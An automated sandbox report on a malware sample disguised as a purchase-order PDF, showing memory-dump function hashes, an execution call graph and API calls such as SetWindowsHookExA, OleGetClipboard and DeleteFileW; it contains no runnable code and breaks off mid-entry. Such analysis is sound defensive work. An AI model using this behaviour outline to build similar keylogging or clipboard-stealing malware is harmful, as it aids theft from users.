                                • Instruction Fuzzy Hash: E3E1E674E042198FDB18DFA9C580AAEFBB2BF89305F24C16AD455AB355D730AD42CF60
                                Function 05E93A70 Relevance: .3, Instructions: 312COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.1329063984.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_5e90000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 89c36e48a6804d563b7a6a86e23eec9b4e7dbfbe0c896a83157792b5aa765161
                                • Instruction ID: dc31fc1c51f5b54d423bc540cc651de815b065fead129bb9b984aa0fa7dde034
                                • Opcode Fuzzy Hash: 89c36e48a6804d563b7a6a86e23eec9b4e7dbfbe0c896a83157792b5aa765161
                                • Instruction Fuzzy Hash: 54E10574E046198FDB18DFA8C580AAEBBF2BF88305F24C569D455AB355D730AD42CFA0
                                Function 0271DC74 Relevance: .3, Instructions: 264COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.1320031802.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_2710000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f32dccb106aa57c350b03f8601314a3628dc0e95a2a8091d8f10a774d81c8fd2
                                • Instruction ID: 9596fc96f8719ccf2bf31d053243e05e51aa673a9c04db72aeab338ad5733787
                                • Opcode Fuzzy Hash: f32dccb106aa57c350b03f8601314a3628dc0e95a2a8091d8f10a774d81c8fd2
                                • Instruction Fuzzy Hash: 9FA15A32E002158FCF1ADFB9C8445DEB7B2FF85304B15856AE806AB265DB75E915CF80
                                Function 05E95139 Relevance: .1, Instructions: 132COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.1329063984.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_5e90000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ac0b169b594fd7b0322a4f527fe1eed975d1cd35ae016809884a430f82b800af
                                • Instruction ID: cdfb36f5ced164b79f72613d093c7f8124b0fb753e1a0c12d66e6fe124be2429
                                • Opcode Fuzzy Hash: ac0b169b594fd7b0322a4f527fe1eed975d1cd35ae016809884a430f82b800af
                                • Instruction Fuzzy Hash: 24510874E042198FDB18CFA9C9805AEFBF2BF89305F24C16AD458A7356D7309942CFA5

                                Execution Graph

                                Execution Coverage:11.4%
                                Dynamic/Decrypted Code Coverage:92.7%
                                Signature Coverage:0%
                                Total number of Nodes:150
                                Total number of Limit Nodes:15
                                execution_graph 24755 28ed01c 24756 28ed034 24755->24756 24757 28ed08e 24756->24757 24762 617d413 24756->24762 24770 6176dac 24756->24770 24778 6178c90 24756->24778 24782 6178c82 24756->24782 24764 617d41a 24762->24764 24763 617d4a1 24794 617c3ec 24763->24794 24764->24763 24766 617d491 24764->24766 24786 617d5b8 24766->24786 24790 617d5c8 24766->24790 24767 617d49f 24767->24767 24771 6176db7 24770->24771 24772 617d4a1 24771->24772 24774 617d491 24771->24774 24773 617c3ec CallWindowProcW 24772->24773 24775 617d49f 24773->24775 24776 617d5b8 CallWindowProcW 24774->24776 24777 617d5c8 CallWindowProcW 24774->24777 24775->24775 24776->24775 24777->24775 24779 6178cb6 24778->24779 24780 6176dac CallWindowProcW 24779->24780 24781 6178cd7 24780->24781 24781->24757 24783 6178c90 24782->24783 24784 6176dac CallWindowProcW 24783->24784 24785 6178cd7 24784->24785 24785->24757 24788 617d5d6 24786->24788 24787 617c3ec CallWindowProcW 24787->24788 24788->24787 24789 617d6b2 24788->24789 24789->24767 24792 617d5d6 24790->24792 24791 617c3ec CallWindowProcW 24791->24792 24792->24791 24793 617d6b2 24792->24793 24793->24767 24795 617c3f7 24794->24795 24796 617d762 CallWindowProcW 24795->24796 24797 617d711 24795->24797 24796->24797 24797->24767 24631 2ab0848 24632 2ab084e 24631->24632 24633 2ab091b 24632->24633 24636 2ab1380 24632->24636 24642 2ab14a7 24632->24642 24638 2ab1396 24636->24638 24637 2ab1498 24637->24632 24638->24637 24639 2ab14a7 2 API calls 24638->24639 24649 6175a43 24638->24649 24657 6175a58 24638->24657 24639->24638 24644 2ab1396 24642->24644 24645 2ab14ab 24642->24645 24643 2ab1498 24643->24632 24644->24643 24646 2ab14a7 2 API calls 24644->24646 24647 6175a43 2 API calls 24644->24647 24648 6175a58 2 API calls 24644->24648 24645->24632 24646->24644 24647->24644 24648->24644 24650 6175a6a 24649->24650 24652 6175b1b 24650->24652 24665 6176089 24650->24665 24670 6176098 24650->24670 24652->24638 24658 6175a6a 24657->24658 24660 6175b1b 24658->24660 24663 6176089 GetModuleHandleW 24658->24663 24664 6176098 GetModuleHandleW 24658->24664 24659 6175ae1 24661 617d9b8 KiUserCallbackDispatcher 24659->24661 24662 617d9c8 KiUserCallbackDispatcher 24659->24662 24660->24638 24661->24660 24662->24660 24663->24659 24664->24659 24666 61760a5 24665->24666 24683 6177001 24666->24683 24690 6177010 24666->24690 24671 61760a5 24670->24671 24673 6177001 GetModuleHandleW 24671->24673 24674 6177010 GetModuleHandleW 24671->24674 24672 6175ae1 24675 617d9b8 24672->24675 24679 617d9c8 24672->24679 24673->24672 24674->24672 24676 617d9d0 24675->24676 24678 617d9f3 24676->24678 24727 617c444 24676->24727 24678->24652 24681 617d9d0 24679->24681 24680 617c444 KiUserCallbackDispatcher 24680->24681 24681->24680 24682 617d9f3 24681->24682 24682->24652 24684 617703b 24683->24684 24697 6177571 24684->24697 24702 6177580 24684->24702 24685 61770ea 24686 61770be 24686->24685 24687 6176c78 GetModuleHandleW 24686->24687 24687->24685 24691 617703b 24690->24691 24695 6177571 GetModuleHandleW 24691->24695 24696 6177580 GetModuleHandleW 24691->24696 24692 61770be 24693 6176c78 GetModuleHandleW 24692->24693 24694 61770ea 24692->24694 24693->24694 24695->24692 24696->24692 24698 61775ad 24697->24698 24699 617762e 24698->24699 24707 617774f 24698->24707 24715 61777de 24698->24715 24703 61775ad 24702->24703 24704 617762e 24703->24704 24705 617774f GetModuleHandleW 24703->24705 24706 61777de GetModuleHandleW 24703->24706 24705->24704 24706->24704 24708 617775a 24707->24708 24723 6176c78 24708->24723 24710 617787a 24711 6176c78 GetModuleHandleW 24710->24711 24712 61778f4 24710->24712 24713 61778c8 24711->24713 24712->24699 24713->24712 24714 6176c78 GetModuleHandleW 24713->24714 24714->24712 24716 617782e 24715->24716 24717 6176c78 GetModuleHandleW 24716->24717 24718 617787a 24717->24718 24719 61778f4 24718->24719 24720 6176c78 GetModuleHandleW 24718->24720 24719->24699 24721 61778c8 24720->24721 24721->24719 24722 6176c78 GetModuleHandleW 24721->24722 24722->24719 24724 6177a30 GetModuleHandleW 24723->24724 24726 6177aa5 24724->24726 24726->24710 24728 617da08 KiUserCallbackDispatcher 24727->24728 24730 617da76 24728->24730 24730->24676 24798 2ab7258 24799 2ab729e DeleteFileW 24798->24799 24801 2ab72d7 24799->24801 24731 617c5f0 24732 617c5f1 GetCurrentProcess 24731->24732 24734 617c681 24732->24734 24735 617c688 GetCurrentThread 24732->24735 24734->24735 24736 617c6c5 GetCurrentProcess 24735->24736 24737 617c6be 24735->24737 24738 617c6fb 24736->24738 24737->24736 24739 617c723 GetCurrentThreadId 24738->24739 24740 617c754 24739->24740 24802 617e280 24803 617e28b 24802->24803 24804 617e29b 24803->24804 24806 617dcf0 24803->24806 24807 617e2d0 OleInitialize 24806->24807 24808 617e334 24807->24808 24808->24804 24741 2abf4c0 24744 2abf4eb 24741->24744 24742 2abfcae SetWindowsHookExA 24743 2abfce2 24742->24743 24744->24742 24745 2abfc34 24744->24745 24809 6177a2a 24810 6177a30 GetModuleHandleW 24809->24810 24812 6177aa5 24810->24812 24746 617e418 24747 617e472 OleGetClipboard 24746->24747 24748 617e4b2 24747->24748 24749 617c838 DuplicateHandle 24750 617c8ce 24749->24750 24751 6178ad8 24752 6178b40 CreateWindowExW 24751->24752 24754 6178bfc 24752->24754

                                Executed Functions

                                Function 0617C5E1 Relevance: 6.1, APIs: 4, Instructions: 135threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 0617C66E
                                • GetCurrentThread.KERNEL32 ref: 0617C6AB
                                • GetCurrentProcess.KERNEL32 ref: 0617C6E8
                                • GetCurrentThreadId.KERNEL32 ref: 0617C741
                                Memory Dump Source
                                • Source File: 00000009.00000002.2549221235.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_6170000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: 9e9b4564eecff4e002a8e0bd5f73db0788223eee91465aa9b55582f9f70ef3ba
                                • Instruction ID: 0d83622e9d186f6cab27edd678ee7f7dc2785eb64ba617287fc0f8acd0e26b4f
                                • Opcode Fuzzy Hash: 9e9b4564eecff4e002a8e0bd5f73db0788223eee91465aa9b55582f9f70ef3ba
                                • Instruction Fuzzy Hash: 205187B0900349CFDB54CFA9C948BAEFBF1AF48300F20845AE458A7351DB349984CFA1
                                Function 0617C5F0 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 0617C66E
                                • GetCurrentThread.KERNEL32 ref: 0617C6AB
                                • GetCurrentProcess.KERNEL32 ref: 0617C6E8
                                • GetCurrentThreadId.KERNEL32 ref: 0617C741
                                Memory Dump Source
                                • Source File: 00000009.00000002.2549221235.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_6170000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: 0e6284140dd925c69f913ec7039a40cfcbd57d986c34585366ede9a9d1a0e445
                                • Instruction ID: 566ae283a5356fbb351c3808d2902641494d1230c8ef390ee62cb28f8c6aed8a
                                • Opcode Fuzzy Hash: 0e6284140dd925c69f913ec7039a40cfcbd57d986c34585366ede9a9d1a0e445
                                • Instruction Fuzzy Hash: A35156B0900749CFDB54CFA9D988BAEFBF1AF48304F208459E459A7350DB749A84CFA5
                                Function 02ABF4C0 Relevance: 2.1, APIs: 1, Instructions: 610COMMON
                                Download Yara Rule
                                APIs
                                • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 02ABFCD3
                                Memory Dump Source
                                • Source File: 00000009.00000002.2544611868.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_2ab0000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: HookWindows
                                • String ID:
                                • API String ID: 2559412058-0
                                • Opcode ID: dd1f7a3d6d1d9138d6fa1a8ea41c5c566b0b8d62f446501af9060f127582010f
                                • Instruction ID: e7274d9f47884e8d34cf4b76afb6ed17ecf96b3f11d758ae79ec7b43c107cb8d
                                • Opcode Fuzzy Hash: dd1f7a3d6d1d9138d6fa1a8ea41c5c566b0b8d62f446501af9060f127582010f
                                • Instruction Fuzzy Hash: 71423834A002048FDB25DB68C984B9DBBB6FF49314F588869E449EB762DB34EC85CF50
                                Function 06178ACE Relevance: 1.6, APIs: 1, Instructions: 115COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 797 6178ace-6178b3e 798 6178b40-6178b46 797->798 799 6178b49-6178b50 797->799 798->799 800 6178b52-6178b58 799->800 801 6178b5b-6178b93 799->801 800->801 802 6178b9b-6178bfa CreateWindowExW 801->802 803 6178c03-6178c3b 802->803 804 6178bfc-6178c02 802->804 808 6178c3d-6178c40 803->808 809 6178c48 803->809 804->803 808->809 810 6178c49 809->810 810->810
                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06178BEA
                                Memory Dump Source
                                • Source File: 00000009.00000002.2549221235.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_6170000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: CreateWindow
                                • String ID:
                                • API String ID: 716092398-0
                                • Opcode ID: e17d4b363a62cd27ad104a363dc5219671073dd869bcbd6c5f20d2a420da4024
                                • Instruction ID: 970747a62c3308d5ade5de54a92b9d1b8abaca8f80be04c0a2356ddc696d41e3
                                • Opcode Fuzzy Hash: e17d4b363a62cd27ad104a363dc5219671073dd869bcbd6c5f20d2a420da4024
                                • Instruction Fuzzy Hash: 4051DFB1D003099FDB54CFAAC984ADEBFB1BF48310F24862AE419AB210D7759945CF90
                                Function 06178AD8 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 811 6178ad8-6178b3e 812 6178b40-6178b46 811->812 813 6178b49-6178b50 811->813 812->813 814 6178b52-6178b58 813->814 815 6178b5b-6178bfa CreateWindowExW 813->815 814->815 817 6178c03-6178c3b 815->817 818 6178bfc-6178c02 815->818 822 6178c3d-6178c40 817->822 823 6178c48 817->823 818->817 822->823 824 6178c49 823->824 824->824
                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06178BEA
                                Memory Dump Source
                                • Source File: 00000009.00000002.2549221235.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_6170000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: CreateWindow
                                • String ID:
                                • API String ID: 716092398-0
                                • Opcode ID: 5de27f40d718682d498a9b9d642d3117399be3f458ebe1511e2b069a162baace
                                • Instruction ID: 61dc4355c048c7228fc055a438abdce8625d92098420a1d25afb68531e1e6d15
                                • Opcode Fuzzy Hash: 5de27f40d718682d498a9b9d642d3117399be3f458ebe1511e2b069a162baace
                                • Instruction Fuzzy Hash: 7841CFB1D003089FDB54CF9AC984ADEBBF5BF48310F24862AE818AB250D775A845CF90
                                Function 0617C3EC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 825 617c3ec-617d704 828 617d7b4-617d7d4 call 6176dac 825->828 829 617d70a-617d70f 825->829 836 617d7d7-617d7e4 828->836 831 617d762-617d79a CallWindowProcW 829->831 832 617d711-617d748 829->832 833 617d7a3-617d7b2 831->833 834 617d79c-617d7a2 831->834 839 617d751-617d760 832->839 840 617d74a-617d750 832->840 833->836 834->833 839->836 840->839
                                APIs
                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 0617D789
                                Memory Dump Source
                                • Source File: 00000009.00000002.2549221235.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_6170000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: CallProcWindow
                                • String ID:
                                • API String ID: 2714655100-0
                                • Opcode ID: cf304a51fa1e90488cdfdd2805b774055999515ab921697fdc27ce887b630efc
                                • Instruction ID: 2507fe6a06f1e5946b2ed1c5a3d6cc52d47f550bb3b72d9c1fd4dbe3cb3d9e0d
                                • Opcode Fuzzy Hash: cf304a51fa1e90488cdfdd2805b774055999515ab921697fdc27ce887b630efc
                                • Instruction Fuzzy Hash: 724129B4D00349CFDB54CF99C888BAABBF5FF88314F248459E559AB321D770A841CBA1
                                Function 0617E40C Relevance: 1.6, APIs: 1, Instructions: 77comclipboardCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 842 617e40c-617e414 843 617e416-617e45f 842->843 844 617e460-617e468 842->844 843->844 845 617e472-617e4b0 OleGetClipboard 844->845 846 617e4b2-617e4b8 845->846 847 617e4b9-617e507 845->847 846->847 852 617e517 847->852 853 617e509-617e50d 847->853 855 617e518 852->855 853->852 854 617e50f 853->854 854->852 855->855
                                APIs
                                Memory Dump Source
                                • Source File: 00000009.00000002.2549221235.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_6170000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: Clipboard
                                • String ID:
                                • API String ID: 220874293-0
                                • Opcode ID: c35b26972641283c7204390eed044d834dbd15c83983993cd50075e527c55c65
                                • Instruction ID: 26c68a93f1441a9b6115e7f5967aca7c9719a999865f237591d4bdb7d92bbd5e
                                • Opcode Fuzzy Hash: c35b26972641283c7204390eed044d834dbd15c83983993cd50075e527c55c65
                                • Instruction Fuzzy Hash: D63112B4D01248DFDB54CF99D984BCEBBF1AF48304F248059E445BB291DBB49845CF60
                                Function 0617E418 Relevance: 1.6, APIs: 1, Instructions: 71comclipboardCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 856 617e418-617e4b0 OleGetClipboard 858 617e4b2-617e4b8 856->858 859 617e4b9-617e507 856->859 858->859 864 617e517 859->864 865 617e509-617e50d 859->865 867 617e518 864->867 865->864 866 617e50f 865->866 866->864 867->867
                                APIs
                                Memory Dump Source
                                • Source File: 00000009.00000002.2549221235.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_6170000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: Clipboard
                                • String ID:
                                • API String ID: 220874293-0
                                • Opcode ID: 470a0b5f3e23c48eeb58d38355d87ba9479e8af4a8fd826df454ab01c9809e61
                                • Instruction ID: 332afb01b5453e6110d8079f7ddc279ea2d8edc19ca711f996b6007a14143f40
                                • Opcode Fuzzy Hash: 470a0b5f3e23c48eeb58d38355d87ba9479e8af4a8fd826df454ab01c9809e61
                                • Instruction Fuzzy Hash: 3631E0B0D01208DFDB54CF99C984BCEBBF5AF48314F248069E405BB290DBB5A885CBA5
                                Function 0617C830 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 868 617c830-617c8cc DuplicateHandle 869 617c8d5-617c8f2 868->869 870 617c8ce-617c8d4 868->870 870->869
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0617C8BF
                                Memory Dump Source
                                • Source File: 00000009.00000002.2549221235.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_6170000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: cc97c73a419527adf1091175e8dee160e82178dc3442e4495e242e0902f40d28
                                • Instruction ID: a1237dbdc916f89bbdda605f55bd16a6f782e7e6718c827993e0c45fc134d39a
                                • Opcode Fuzzy Hash: cc97c73a419527adf1091175e8dee160e82178dc3442e4495e242e0902f40d28
                                • Instruction Fuzzy Hash: BF21E3B5D00248DFDB10CFA9D984AEEFBF5EB48310F14842AE958A7251D374A955CFA0
                                Function 0617C838 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 873 617c838-617c8cc DuplicateHandle 874 617c8d5-617c8f2 873->874 875 617c8ce-617c8d4 873->875 875->874
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0617C8BF
                                Memory Dump Source
                                • Source File: 00000009.00000002.2549221235.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_6170000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 7264fc0824ad4b5bb7457f0592f65bd85823ac3f8fbeaa574157a31cba2e9859
                                • Instruction ID: 9a645d65015c17d3a3748d2894fd8af2a69087b4e5fb26ee92e09d991bd1d061
                                • Opcode Fuzzy Hash: 7264fc0824ad4b5bb7457f0592f65bd85823ac3f8fbeaa574157a31cba2e9859
                                • Instruction Fuzzy Hash: 3921E4B5D002089FDB10CF9AD984ADEFBF4FB48310F14842AE958A7350D374A944CFA1
                                Function 02AB7253 Relevance: 1.6, APIs: 1, Instructions: 58fileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 878 2ab7253-2ab72a2 880 2ab72aa-2ab72d5 DeleteFileW 878->880 881 2ab72a4-2ab72a7 878->881 882 2ab72de-2ab7306 880->882 883 2ab72d7-2ab72dd 880->883 881->880 883->882
                                APIs
                                • DeleteFileW.KERNELBASE(00000000), ref: 02AB72C8
                                Memory Dump Source
                                • Source File: 00000009.00000002.2544611868.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_2ab0000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: DeleteFile
                                • String ID:
                                • API String ID: 4033686569-0
                                • Opcode ID: 4f066c50d082390ef934c84d8e34dd5140ae4e4a832c63ab74fcad0ab4b124b6
                                • Instruction ID: 5d384652f581b5ba3f60664fc2b9a8920afde31af3ed1630ebfcf8168b3756b2
                                • Opcode Fuzzy Hash: 4f066c50d082390ef934c84d8e34dd5140ae4e4a832c63ab74fcad0ab4b124b6
                                • Instruction Fuzzy Hash: 7C2158B1C006599FDB14CFAAC5447EEFBF4EF48320F148169D858A7241D778A945CFA0
                                Function 02AB7258 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 886 2ab7258-2ab72a2 888 2ab72aa-2ab72d5 DeleteFileW 886->888 889 2ab72a4-2ab72a7 886->889 890 2ab72de-2ab7306 888->890 891 2ab72d7-2ab72dd 888->891 889->888 891->890
                                APIs
                                • DeleteFileW.KERNELBASE(00000000), ref: 02AB72C8
                                Memory Dump Source
                                • Source File: 00000009.00000002.2544611868.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_2ab0000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: DeleteFile
                                • String ID:
                                • API String ID: 4033686569-0
                                • Opcode ID: 78d280783a49aac6ab99a46399bea58176cc6db0bccbfac9b37381b7f0d125e9
                                • Instruction ID: 0b6423759b842a8dbe6795a4352b3dac562e06abf019166c46109409bb4b0ab1
                                • Opcode Fuzzy Hash: 78d280783a49aac6ab99a46399bea58176cc6db0bccbfac9b37381b7f0d125e9
                                • Instruction Fuzzy Hash: D81147B2C0065A9FDB10CF9AC5447EEFBF4EF48320F15812AE818A7241D778A944CFA1
                                Function 06176C78 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 894 6176c78-6177a70 896 6177a72-6177a75 894->896 897 6177a78-6177aa3 GetModuleHandleW 894->897 896->897 898 6177aa5-6177aab 897->898 899 6177aac-6177ac0 897->899 898->899
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000), ref: 06177A96
                                Memory Dump Source
                                • Source File: 00000009.00000002.2549221235.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_6170000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: 5c078a4eda86da977f09673d5fe8357f0fbaf1e69bfbac1104c56b4cb1ac75ee
                                • Instruction ID: e938b18a6af51bab89b050ad805cc88f770a3ec768aa141cde9c7ca03ee064c7
                                • Opcode Fuzzy Hash: 5c078a4eda86da977f09673d5fe8357f0fbaf1e69bfbac1104c56b4cb1ac75ee
                                • Instruction Fuzzy Hash: 03110FB5C007498FEB10DF9AC844BDEFBF4EB88210F14882AD859B7250D375A645CFA1
                                Function 06177A2A Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 901 6177a2a-6177a70 903 6177a72-6177a75 901->903 904 6177a78-6177aa3 GetModuleHandleW 901->904 903->904 905 6177aa5-6177aab 904->905 906 6177aac-6177ac0 904->906 905->906
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000), ref: 06177A96
                                Memory Dump Source
                                • Source File: 00000009.00000002.2549221235.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_6170000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: 6b3f5c61e7b521ce0f44469574a91ce944cb100aa5766476d02209ae925cdea8
                                • Instruction ID: 15b6491253e9d17788ab49a14094c412c279f8cf8c6de7e5d92e5442c25951f3
                                • Opcode Fuzzy Hash: 6b3f5c61e7b521ce0f44469574a91ce944cb100aa5766476d02209ae925cdea8
                                • Instruction Fuzzy Hash: 7C110FB6C007498FEB10DF9AC944BDEFBF4AB88310F14842AD859B7250C379A645CFA1
                                Function 0617C444 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                Download Yara Rule
                                APIs
                                • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,0617D9DD), ref: 0617DA67
                                Memory Dump Source
                                • Source File: 00000009.00000002.2549221235.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_6170000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: CallbackDispatcherUser
                                • String ID:
                                • API String ID: 2492992576-0
                                • Opcode ID: 839372f5012e79eaf6833bbba5d95c1065b26458e35d3bbec022226476fb2925
                                • Instruction ID: 70287041243351c8afafa5da2cf59c810dd8b9507c83fcf4d46357a520f788e8
                                • Opcode Fuzzy Hash: 839372f5012e79eaf6833bbba5d95c1065b26458e35d3bbec022226476fb2925
                                • Instruction Fuzzy Hash: D31110B1804348CFDB10DF9AD484B9EBBF4EF48320F20842AD959A7250C374A944CBA5
                                Function 0617DCF0 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                Download Yara Rule
                                APIs
                                • OleInitialize.OLE32(00000000), ref: 0617E325
                                Memory Dump Source
                                • Source File: 00000009.00000002.2549221235.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_6170000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: Initialize
                                • String ID:
                                • API String ID: 2538663250-0
                                • Opcode ID: 76b91f8d0cabb01bbfb134513530c64237684ade37f174f0a8fecb7c3818c872
                                • Instruction ID: 71cd1652ce92f13f7650942bfb66fa0e8e605c381f3cdf14bf5b80eeb4fdb6d2
                                • Opcode Fuzzy Hash: 76b91f8d0cabb01bbfb134513530c64237684ade37f174f0a8fecb7c3818c872
                                • Instruction Fuzzy Hash: 511133B08043488FDB10DF9AC444BDEFBF4EB48310F108869D558A7210C375A944CFA5
                                Function 0617E2C9 Relevance: 1.5, APIs: 1, Instructions: 45comCOMMON
                                Download Yara Rule
                                APIs
                                • OleInitialize.OLE32(00000000), ref: 0617E325
                                Memory Dump Source
                                • Source File: 00000009.00000002.2549221235.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
